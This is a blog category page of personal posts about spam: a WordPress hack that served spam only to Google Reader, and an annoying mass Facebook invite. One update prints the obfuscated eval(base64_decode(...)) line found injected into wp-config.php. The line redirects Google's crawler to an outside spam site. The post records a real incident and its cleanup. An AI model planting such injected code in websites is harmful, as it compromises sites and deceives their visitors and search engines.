Category: Spam

Spam

Blog still hacked?

I mentioned here the other day that this blog was hacked and I thought I had resolved it – now I’m not so sure.

The hack is a tricky one because the spam it is displaying is only visible in Google Reader! (and not in any other RSS reader).

I have completely deleted all the WordPress files, including themes and plug-ins, and uploaded fresh copies of them. I have hardened the file permissions run scans and a few other recommended steps but when I log in to Google Reader I still see new spam posts. This is very disheartening.

I’m hoping that the situation is, in fact, resolved and that Google Reader simply hasn’t updated its cache. The hack also did a 302 re-direct on the feed, so perhaps Google needs to refresh its DNS, I’m not sure, nor am I sure hoow often they perform this.

So for now, I’m in a holding position. I won’t make any more changes and I’ll see if the spam continues.

Stay tuned!!!

Spam

Blog hacked? UPDATED

This blog appears to have been hacked somehow.

This is my old blog and apart from a test posting the other day, I hadn’t added any new posts since May 2009.

Blog posts

However, when you view this blog’s feed in Google Reader it appears to be full of spammy posts.

Spammy posts in Google Reader

The spammy posts don’t show up when viewing the blog’s feed in Firefox (or Safari) RSS readers – it seems to be confined to Google Reader somehow.

Feed seen in Firefox

I also checked the backend mysql database and the spammy posts are not there so I’m not sure where they are coming from.

I was using the FeedBurner Feedsmith plugin for handling this blog’s feeds but I deactivated that over the weekend when I first became aware of this issue. I thought perhaps the FeedBurner feed may have been hacked so that if I turned it off, any cached spam posts would be cleared out after a day or so, however it seems to not only have persisted but more posts have been added.

Anyone any idea how this is happening and what I can do to stop it?

UPDATE –

With help from Ewan – I discovered that (after looking around at a lot of other files) the wp-config.php file had been edited. The following line had been added

eval(base64_decode('JGFnZW50PSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTtpZihlcmV
naSgiZ29vZ2xlIiwgJGFnZW50KSl7aGVhZGVyKCJIVFRQLzEuMSAzMDEiKTtoZWFkZXIoIkxv
Y2F0aW9uOiBodHRwOi8vYmFibG8ubWUudWsvIik7ZXhpdCgpO30='));

To be safe, I FTP’d in to the server, deleted the wp-config.php file and uploaded a clean one.

The site is now back to working as expected, apologies to anyone who was exposed to the spammy links.

I’ll now go back over the site again with the proverbial fine-toothed comb to see if I can find any other suspicious changes that were made to it.

Spam

Funny FaceBook spam!

Ironic FaceBook Spam

I received this FaceBook invite to a webinar from Chris Abraham of AbrahamHarrison and Jay Jaffe of Jaffe Associates.

This invite was sent to over 2,200 people on FaceBook. Seems like kind of spammy behaviour to me!

Ironically the webinar is on “how to look after your online reputation and why it is important to do so”.

I guess they did this for the “What NOT to do” part of the webinar!

I suppose I received the invite because I chose to accept a Friend request from Chris Abraham back in 2007. This is not the first invite I have received from Chris since then (far from it). The dangers not being selective enough with who you friend on FaceBook, eh?

Dear FaceBook, please put an UnFriend link on invites like this so that with a single click I can insure I don’t receive any more,

Thanks,

Tom.